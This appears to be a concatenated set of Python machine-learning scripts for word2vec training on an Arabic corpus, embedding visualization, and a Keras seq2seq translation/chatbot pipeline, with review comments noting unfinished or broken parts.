    text = f.read()
# print(text[:500])
# split the corpus into ayat (verses) on '.', then each ayah into words
ayat = text.split(".")
words = []
for ayah in ayat:
    words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
# filter stop words per-ayah
new_words = []
for ayah in words:
    new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
# flatten to build the vocabulary; ids start at 1 (0 is the pad value)
vocab = []
for ayah in new_words:
    for w in ayah:
        vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
    encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
# decode back to strings, mapping the pad id 0 to the sentinel "_unk_"
words = []
for seq in encoded_words:
    words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
# Minimal embedding probe model: embed -> flatten -> single dense unit.
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
# NOTE(review): fit() is called with no data/labels, which raises at runtime;
# this script looks unfinished -- confirm intended training inputs.
model.fit()
def chunk_seq(seq, num):
    """Split *seq* into *num* chunks of (nearly) equal size.

    Uses fractional boundaries so chunk sizes differ by at most one
    element; returns a list of slices of the original sequence.
    """
    chunk_size = len(seq) / float(num)
    total = len(seq)
    chunks = []
    position = 0.0
    while position < total:
        start, stop = int(position), int(position + chunk_size)
        chunks.append(seq[start:stop])
        position += chunk_size
    return chunks
def encode_words(words, vocab2int):
    """Map each word to its integer id, skipping out-of-vocabulary words.

    :param words: iterable of word strings
    :param vocab2int: dict mapping word -> integer id
    :return: list of integer ids (unknown words are silently dropped)
    """
    _MISSING = object()  # sentinel so a legitimate id of 0 is kept
    encoded = []
    for word in words:
        code = vocab2int.get(word, _MISSING)
        # BUG FIX: the original tested `if c:`, which also discarded words
        # whose id is 0 (falsy), not just words missing from the vocab.
        if code is not _MISSING:
            encoded.append(code)
    return encoded
def remove_stop_words(vocab):
    """Remove a fixed set of common English stop words from *vocab* in place.

    Mirrors list.remove() semantics: only the first occurrence of each
    word is removed, and a missing word raises ValueError.
    """
    for stop_word in ("the", "of", "and", "in", "a", "to", "is", "as", "for"):
        vocab.remove(stop_word)
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917@gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
    """Export a gensim word2vec model as a TensorBoard embedding projector run.

    Writes the vocabulary to a .tsv metadata file, stores the embedding
    matrix in a TF1 checkpoint, and wires both into a projector config
    under *output_path*.

    NOTE(review): uses the TensorFlow 1.x API (InteractiveSession,
    tf.contrib projector); this will not run under TF 2.x -- confirm the
    target TF version.
    """
    meta_file = "w2x_metadata.tsv"
    # one row per vocabulary word, filled from the model below
    placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
    with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
        for i, word in enumerate(model.wv.index2word):
            placeholder[i] = model[word]
            # temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
            if word == '':
                print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
                file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
            else:
                file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
    # define the model without training
    sess = tf.InteractiveSession()
    # embedding variable holding the word vectors; frozen (not trainable)
    embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
    tf.global_variables_initializer().run()
    saver = tf.train.Saver()
    writer = tf.summary.FileWriter(output_path, sess.graph)
    # adding into projector
    config = projector.ProjectorConfig()
    embed = config.embeddings.add()
    embed.tensor_name = 'w2x_metadata'
    embed.metadata_path = meta_file
    # Specify the width and height of a single thumbnail.
    projector.visualize_embeddings(writer, config)
    saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
    print('Run tensorboard --logdir={0} to run visualize result on tensorboard'.format(output_path))
if __name__ == "__main__":
    """
    Use model.save_word2vec_format to save w2v_model as word2evc format
    Then just run python w2v_visualizer.py word2vec.text visualize_result
    """
    try:
        model_path = sys.argv[1]
        output_path = sys.argv[2]
    except IndexError:
        # BUG FIX: the original printed a warning but fell through and then
        # crashed with a NameError on the undefined paths; exit cleanly
        # instead (also fixes the "provice" typo in the message).
        print("Please provide model path and output path")
        sys.exit(1)
    model = KeyedVectors.load_word2vec_format(model_path)
    # make sure the output directory exists before writing into it
    pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
    visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
    """A class utility for generating Neural-Machine-Translation large datasets"""
    def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
                source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
                batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
                same_tokenizer=False, char_level=False, verbose=0):
        # paths of the parallel source/target corpora (one sample per line)
        self.source_file = source_file
        self.target_file = target_file
        self.same_tokenizer = same_tokenizer
        self.char_level = char_level
        if not load_tokenizers:
            # x ( source ) tokenizer
            self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
            # y ( target ) tokenizer
            self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
        else:
            # reuse tokenizers pickled by a previous run
            self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
            self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
        # remove '?' and '.' from filters
        # which means include them in vocabulary
        # add "'" to filters
        self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
        self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
        if char_level:
            # at char level, '.' and ',' are also kept in the vocabulary
            self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
            self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
        if same_tokenizer:
            self.y_tk = self.x_tk
        # max sequence length of source language
        self.source_sequence_length = source_sequence_length
        # max sequence length of target language
        self.target_sequence_length = target_sequence_length
        # vocab size of encoder
        self.num_encoder_tokens = num_encoder_tokens
        # vocab size of decoder
        self.num_decoder_tokens = num_decoder_tokens
        # the batch size
        self.batch_size = batch_size
        # the ratio which the dataset will be partitioned
        self.validation_split = validation_split
        # whether to dump x_tk and y_tk when finished tokenizing
        # NOTE(review): this flag is never checked -- tokenize() always dumps;
        # confirm whether the dump should be conditional.
        self.dump_tokenizers = dump_tokenizers
        # cap to remove _unk_ samples
        self.n_unk_to_remove = 2
        self.verbose = verbose
    def load_dataset(self):
        """Loads the dataset:
            1. load the data from files
            2. tokenize and calculate sequence lengths and num_tokens
            3. post pad the sequences"""
        self.load_data()
        if self.verbose:
            print("[+] Data loaded")
        self.tokenize()
        if self.verbose:
            print("[+] Text tokenized")
        self.pad_sequences()
        if self.verbose:
            print("[+] Sequences padded")
        self.split_data()
        if self.verbose:
            print("[+] Data splitted")
    def load_data(self):
        """Loads data from files"""
        self.X = load_data(self.source_file)
        self.y = load_data(self.target_file)
        # remove much unks on a single sample
        # drop any pair where either side has too many "_unk_" placeholders
        X, y = [], []
        co = 0
        for question, answer in zip(self.X, self.y):
            if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
                co += 1
            else:
                X.append(question)
                y.append(answer)
        self.X = X
        self.y = y
        if self.verbose >= 1:
            print("[*] Number of samples:", len(self.X))
        if self.verbose >= 2:
            print("[!] Number of samples deleted:", co)
    def tokenize(self):
        """Tokenizes sentences/strings as well as calculating input/output sequence lengths
        and input/output vocab sizes"""
        self.x_tk.fit_on_texts(self.X)
        self.y_tk.fit_on_texts(self.y)
        self.X = self.x_tk.texts_to_sequences(self.X)
        self.y = self.y_tk.texts_to_sequences(self.y)
        # calculate both sequence lengths ( source and target )
        self.source_sequence_length = max([len(x) for x in self.X])
        self.target_sequence_length = max([len(x) for x in self.y])
        # calculating number of encoder/decoder vocab sizes
        # (+1 because Keras tokenizer ids start at 1; 0 is the pad value)
        self.num_encoder_tokens = len(self.x_tk.index_word) + 1
        self.num_decoder_tokens = len(self.y_tk.index_word) + 1
        # dump tokenizers
        pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
        pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
    def pad_sequences(self):
        """Pad sequences"""
        # post-padding keeps real tokens at the start of every sequence
        self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
        self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
    def split_data(self):
        """split training/validation sets using self.validation_split"""
        split_value = int(len(self.X)*self.validation_split)
        self.X_test = self.X[:split_value]
        self.X_train = self.X[split_value:]
        self.y_test = self.y[:split_value]
        self.y_train = self.y[split_value:]
        # free up memory
        del self.X
        del self.y
    def shuffle_data(self, train=True):
        """Shuffles X and y together
        :params train (bool): whether to shuffle training data, default is True
            Note that when train is False, testing data is shuffled instead."""
        # saving/restoring the RNG state shuffles X and y with the same permutation
        state = np.random.get_state()
        if train:
            np.random.shuffle(self.X_train)
            np.random.set_state(state)
            np.random.shuffle(self.y_train)
        else:
            np.random.shuffle(self.X_test)
            np.random.set_state(state)
            np.random.shuffle(self.y_test)
    def next_train(self):
        """Training set generator"""
        return self.generate_batches(self.X_train, self.y_train, train=True)
    def next_validation(self):
        """Validation set generator"""
        return self.generate_batches(self.X_test, self.y_test, train=False)
    def generate_batches(self, X, y, train=True):
        """Data generator"""
        same_tokenizer = self.same_tokenizer
        batch_size = self.batch_size
        char_level = self.char_level
        source_sequence_length = self.source_sequence_length
        target_sequence_length = self.target_sequence_length
        if same_tokenizer:
            # shared tokenizer: use one vocab size for both sides
            num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
            num_decoder_tokens = num_encoder_tokens
        else:
            num_encoder_tokens = self.num_encoder_tokens
            num_decoder_tokens = self.num_decoder_tokens
        while True:
            for j in range(0, len(X), batch_size):
                encoder_input_data = X[j: j+batch_size]
                decoder_input_data = y[j: j+batch_size]
                # update batch size ( different size in last batch of the dataset )
                # NOTE(review): this rebinding is permanent, so after a short
                # final batch every later epoch iterates with the shrunken
                # step -- confirm whether that is intended.
                batch_size = encoder_input_data.shape[0]
                if self.char_level:
                    encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
                    decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
                else:
                    encoder_data = encoder_input_data
                    decoder_data = decoder_input_data
                # targets are always one-hot (compared against the softmax dense layer)
                decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
                if char_level:
                    # if its char level, one-hot all sequences of characters
                    for i, sequence in enumerate(decoder_input_data):
                        for t, word_index in enumerate(sequence):
                            if t > 0:
                                # target is the decoder input shifted left by one step
                                decoder_target_data[i, t - 1, word_index] = 1
                                decoder_data[i, t, word_index] = 1
                    for i, sequence in enumerate(encoder_input_data):
                        for t, word_index in enumerate(sequence):
                            encoder_data[i, t, word_index] = 1
                else:
                    # if its word level, one-hot only target_data ( the one compared with dense )
                    for i, sequence in enumerate(decoder_input_data):
                        for t, word_index in enumerate(sequence):
                            if t > 0:
                                decoder_target_data[i, t - 1, word_index] = 1
                yield ([encoder_data, decoder_data], decoder_target_data)
            # shuffle data when an epoch is finished
            self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
    """Build an embedding matrix for the tokenizer's vocabulary from GloVe.

    Reads the 300-d GloVe vectors from data/glove.6B.300d.txt and places
    each known word's vector at its tokenizer index; row 0 and any word
    missing from GloVe stay all-zero.
    """
    glove_vectors = {}
    with open("data/glove.6B.300d.txt", encoding='utf8') as glove_file:
        for raw_line in tqdm.tqdm(glove_file, "Reading GloVe"):
            token, *coeffs = raw_line.split()
            glove_vectors[token] = np.asarray(coeffs, dtype='float32')
    vocab_index = tokenizer.word_index
    # +1 because Keras tokenizer indices start at 1 (0 is reserved for padding)
    matrix = np.zeros((len(vocab_index) + 1, 300))
    for token, idx in vocab_index.items():
        vector = glove_vectors.get(token)
        # tokens not found in GloVe keep their all-zero row
        if vector is not None:
            matrix[idx] = vector
    return matrix
def load_data(filename):
    """Read *filename* into a list of stripped lines.

    :param filename: path of the text file to read
    :return: list of lines with surrounding whitespace removed
    """
    text = []
    append = text.append
    with open(filename) as f:
        # BUG FIX: the progress-bar label was a placeholder-less f-string
        # literal; show the file actually being read instead.
        for line in tqdm.tqdm(f, f"Reading {filename}"):
            line = line.strip()
            append(line)
    return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
    """Build a seq2seq LSTM encoder-decoder plus its two inference models.

    :param num_encoder_tokens: encoder vocabulary size
    :param latent_dim: LSTM state size (and embedding dim when embedding is used)
    :param num_decoder_tokens: decoder vocabulary size (softmax width)
    :param embedding_matrix: optional pretrained weights for a frozen embedding
    :param embedding_layer: if False, inputs are expected one-hot instead of ids
    :return: (training model, encoder inference model, decoder inference model)

    NOTE(review): the embedding layer is shared between encoder and decoder,
    so it is sized with num_encoder_tokens -- both vocabularies must fit it.
    """
    # ENCODER
    # define an input sequence and process it
    if embedding_layer:
        encoder_inputs = Input(shape=(None,))
        if embedding_matrix is None:
            encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
        else:
            # pretrained, frozen embedding
            encoder_emb_layer = Embedding(num_encoder_tokens,
                                        latent_dim,
                                        mask_zero=True,
                                        weights=[embedding_matrix],
                                        trainable=False)
        encoder_emb = encoder_emb_layer(encoder_inputs)
    else:
        encoder_inputs = Input(shape=(None, num_encoder_tokens))
        encoder_emb = encoder_inputs
    encoder_lstm = LSTM(latent_dim, return_state=True)
    encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
    # we discard encoder_outputs and only keep the states
    encoder_states = [state_h, state_c]
    # DECODER
    # Set up the decoder, using encoder_states as initial state
    if embedding_layer:
        decoder_inputs = Input(shape=(None,))
    else:
        decoder_inputs = Input(shape=(None, num_encoder_tokens))
    # add an embedding layer
    # decoder_emb_layer = Embedding(num_decoder_tokens, latent_dim, mask_zero=True)
    if embedding_layer:
        decoder_emb = encoder_emb_layer(decoder_inputs)
    else:
        decoder_emb = decoder_inputs
    # we set up our decoder to return full output sequences
    # and to return internal states as well, we don't use the
    # return states in the training model, but we will use them in inference
    decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
    decoder_outputs, _, _, = decoder_lstm(decoder_emb, initial_state=encoder_states)
    # dense output layer used to predict each character ( or word )
    # in one-hot manner, not recursively
    decoder_dense = Dense(num_decoder_tokens, activation="softmax")
    decoder_outputs = decoder_dense(decoder_outputs)
    # finally, the model is defined with inputs for the encoder and the decoder
    # and the output target sequence
    # turn encoder_input_data & decoder_input_data into decoder_target_data
    # NOTE(review): `output=` is the legacy Keras 1 keyword; modern Keras
    # expects `outputs=` -- confirm against the installed Keras version.
    model = Model([encoder_inputs, decoder_inputs], output=decoder_outputs)
    # model.summary()
    # define encoder inference model
    encoder_model = Model(encoder_inputs, encoder_states)
    # define decoder inference model
    decoder_state_input_h = Input(shape=(latent_dim,))
    decoder_state_input_c = Input(shape=(latent_dim,))
    decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]
    # Get the embeddings of the decoder sequence
    if embedding_layer:
        dec_emb2 = encoder_emb_layer(decoder_inputs)
    else:
        dec_emb2 = decoder_inputs
    decoder_outputs, state_h, state_c = decoder_lstm(dec_emb2, initial_state=decoder_states_inputs)
    decoder_states = [state_h, state_c]
    decoder_outputs = decoder_dense(decoder_outputs)
    decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)
    return model, encoder_model, decoder_model
def predict_sequence(enc, dec, source, n_steps, cardinality, char_level=False):
    """Generate target given source sequence, this function can be used
    after the model is trained to generate a target sequence given a source sequence.

    :param enc: encoder inference model (predict -> [state_h, state_c])
    :param dec: decoder inference model (predict -> (y, state_h, state_c))
    :param source: encoded source sequence
    :param n_steps: number of decoding steps to run
    :param cardinality: one-hot width of the output vocabulary (char level)
    :param char_level: whether tokens are one-hot character vectors
    :return: np.array of predicted token indices (or one-hot vectors)
    """
    # encode the source into the initial decoder state
    state = enc.predict(source)
    # start-of-sequence input: an all-zero token
    # BUG FIX: the one-hot width was hard-coded to 61, silently ignoring the
    # `cardinality` parameter; use the parameter so any vocab size works.
    if char_level:
        target_seq = np.zeros((1, 1, cardinality))
    else:
        target_seq = np.zeros((1, 1))
    # collect predictions
    output = []
    for t in range(n_steps):
        # predict the next token from the previous token + current state
        yhat, h, c = dec.predict([target_seq] + state)
        # store predictions
        y = yhat[0, 0, :]
        if char_level:
            sampled_token_index = to_categorical(np.argmax(y), num_classes=cardinality)
        else:
            sampled_token_index = np.argmax(y)
        output.append(sampled_token_index)
        # update state
        state = [h, c]
        # feed the sampled token back in as the next decoder input
        if char_level:
            target_seq = np.zeros((1, 1, cardinality))
        else:
            target_seq = np.zeros((1, 1))
        target_seq[0, 0] = sampled_token_index
    return np.array(output)
def decode_sequence(enc, dec, input_seq):
    """Greedily decode *input_seq* with the encoder/decoder inference models.

    :param enc: encoder inference model (predict -> [state_h, state_c])
    :param dec: decoder inference model (predict -> (tokens, state_h, state_c))
    :param input_seq: encoded source sequence
    :return: list of raw decoder output distributions, one per step
    """
    # Encode the input as state vectors.
    states_value = enc.predict(input_seq)
    # Generate empty target sequence of length 1, seeded with the start token (0).
    target_seq = np.zeros((1, 1))
    target_seq[0, 0] = 0
    # Sampling loop for a batch of sequences
    # (to simplify, here we assume a batch of size 1).
    stop_condition = False
    # BUG FIX: the original initialized `decoded_sequence` but appended to
    # (and returned) the undefined name `decoded_sentence`, raising NameError
    # on the first iteration; one consistent name is used throughout now.
    decoded_sequence = []
    while not stop_condition:
        output_tokens, h, c = dec.predict([target_seq] + states_value)
        # Sample a token
        sampled_token_index = np.argmax(output_tokens[0, -1, :])
        decoded_sequence.append(output_tokens[0, -1, :])
        # Exit condition: hit max length.
        # NOTE(review): the original also tested `output_tokens == '<PAD>'`,
        # an ndarray-vs-string comparison that was always falsy; a real
        # stop-token check should compare sampled_token_index -- confirm
        # the pad token's index before adding one.
        if len(decoded_sequence) > 50:
            stop_condition = True
        # Update the target sequence (of length 1).
        target_seq = np.zeros((1, 1))
        target_seq[0, 0] = sampled_token_index
        # Update states
        states_value = [h, c]
    return decoded_sequence
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
def tokenize(x, tokenizer=None):
    """Turn a list of sentences into integer id sequences.

    :param x: List of sentences/strings to be tokenized
    :param tokenizer: optional pre-fitted tokenizer; when omitted (or falsy)
        a fresh Tokenizer is created and fitted on *x*
    :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
    if not tokenizer:
        tokenizer = Tokenizer()
        tokenizer.fit_on_texts(x)
    return tokenizer.texts_to_sequences(x), tokenizer
def pad(x, length=None):
    """Post-pad a batch of sequences to a common length.

    :param x: list of sequences
    :param length: Length to pad each sequence to; if None, the length of
        the longest sequence in x is used.
    :return: Padded numpy array of sequences"""
    padded = pad_sequences(x, maxlen=length, padding="post")
    return padded
def preprocess(x, y):
    """Tokenize and pad parallel source/target corpora for seq2seq training.

    :param x: Feature list of sentences
    :param y: Label list of sentences
    :return: Tuple of (padded x, padded start-token-prefixed y, one-hot y,
        x tokenizer, y tokenizer)"""
    encoded_x, x_tk = tokenize(x)
    encoded_y, y_tk = tokenize(y)
    # decoder input: target sequences shifted right by a leading start token (0)
    shifted_y = [[0] + seq for seq in encoded_y]
    # pad everything to one shared length: the longer of the longest source
    # and the longest shifted target
    max_length = max(
        max(len(seq) for seq in encoded_x),
        max(len(seq) for seq in encoded_y) + 1,
    )
    padded_x = pad(encoded_x, length=max_length)
    padded_x2 = pad(shifted_y, length=max_length)
    # only the targets are one-hot encoded (compared against the softmax layer)
    padded_y = to_categorical(pad(encoded_y, length=max_length))
    return padded_x, padded_x2, padded_y, x_tk, y_tk
def load_data(filename):
    """Read *filename* and return its contents split on newlines."""
    with open(filename) as data_file:
        contents = data_file.read()
    return contents.split("\n")
def load_dataset():
    """Load the small English/French parallel corpora and preprocess them."""
    english = load_data("data/small_vocab_en")
    french = load_data("data/small_vocab_fr")
    return preprocess(english, french)
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
if __name__ == "__main__":
    # Smoke-test the generator: load the small parallel corpus and print
    # the derived vocab sizes, sequence lengths and a sample batch.
    from generator import NMTGenerator
    gen = NMTGenerator(source_file="data/small_vocab_en", target_file="data/small_vocab_fr")
    gen.load_dataset()
    print(gen.num_decoder_tokens)
    print(gen.num_encoder_tokens)
    print(gen.source_sequence_length)
    print(gen.target_sequence_length)
    # NOTE(review): split_data() deletes gen.X/gen.y, so these two reads and
    # the len(gen.X) below raise AttributeError; generate_batches() is also
    # called without its required X/y arguments -- this demo looks stale.
    print(gen.X.shape)
    print(gen.y.shape)
    for i, ((encoder_input_data, decoder_input_data), decoder_target_data) in enumerate(gen.generate_batches()):
        # print("encoder_input_data.shape:", encoder_input_data.shape)
        # print("decoder_output_data.shape:", decoder_input_data.shape)
        if i % (len(gen.X) // gen.batch_size + 1) == 0:
            print(i, ": decoder_input_data:", decoder_input_data[0])
# to use CPU
# Force TensorFlow onto the CPU: hide all CUDA devices before TF is imported,
# then build a session config capped at 5 intra/inter-op threads.
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5, 
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                       )
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
# Load the tokenizers dumped during training and build the reverse
# (id -> word) lookup; id 0 is the padding slot, rendered as '_'.
# NOTE(review): the comprehension variable `id` shadows the builtin.
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
    """
    Turn a sequence of predicted token indices into a space-joined string
    using the module-level `index_to_words` lookup.
    :param logits: iterable of integer token indices
    :return: String that represents the text of the logits
    """
    tokens = [index_to_words[token_id] for token_id in logits]
    return ' '.join(tokens)
# Interactive word-level chat loop: rebuild the seq2seq models, load the
# trained weights and greedily decode one reply per input line.
# NOTE(review): vocab size 29046 and sequence length 37 are hard-coded to
# match the chatbot_v13 checkpoint -- confirm against the training run.
num_encoder_tokens = 29046
num_decoder_tokens = 29046
latent_dim = 300
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_v13_4.831_0.219.h5")
while True:
    text = input("> ")
    tokenized = tokenize([text], tokenizer=y_tk)[0]
    # print("tokenized:", tokenized)
    X = pad(tokenized, length=37)
    sequence = predict_sequence(enc, dec, X, 37, num_decoder_tokens)
    # print(sequence)
    result = logits_to_text(sequence)
    print(result)
# to use CPU
# Same CPU-only TensorFlow setup as the word-level script: hide CUDA
# devices before importing TF and cap the session thread pools.
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5, 
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                       )
from models import predict_sequence, encoder_decoder_model
from preprocess import tokenize, pad
from keras.utils import to_categorical
from generator import get_embedding_vectors
import pickle
import numpy as np
# Load the pickled char-level tokenizers and build the reverse
# (id -> character) lookup; id 0 is the padding slot, rendered as '_'.
# NOTE(review): the comprehension variable `id` shadows the builtin.
x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
index_to_words = {id: word for word, id in y_tk.word_index.items()}
index_to_words[0] = '_'
def logits_to_text(logits):
    """
    Convert a sequence of one-hot character vectors into a string.

    Each prediction is a one-hot vector; the index of its set element is
    looked up in the module-level `index_to_words` mapping.
    :param logits: iterable of one-hot vectors
    :return: decoded string
    """
    # return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
    decoded_chars = []
    for one_hot in logits:
        hot_index = np.where(one_hot)[0][0]
        decoded_chars.append(index_to_words[hot_index])
    return "".join(decoded_chars)
# Interactive char-level chat loop: one-hot inputs (no embedding layer),
# greedy decoding for up to 206 characters per reply.
# NOTE(review): vocab size 61, input length 37 and output length 206 are
# hard-coded to match the chatbot_charlevel_v2 checkpoint -- confirm.
num_encoder_tokens = 61
num_decoder_tokens = 61
latent_dim = 384
# embedding_vectors = get_embedding_vectors(x_tk)
model, enc, dec = encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_layer=False)
enc.summary()
dec.summary()
model.summary()
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
while True:
    text = input("> ")
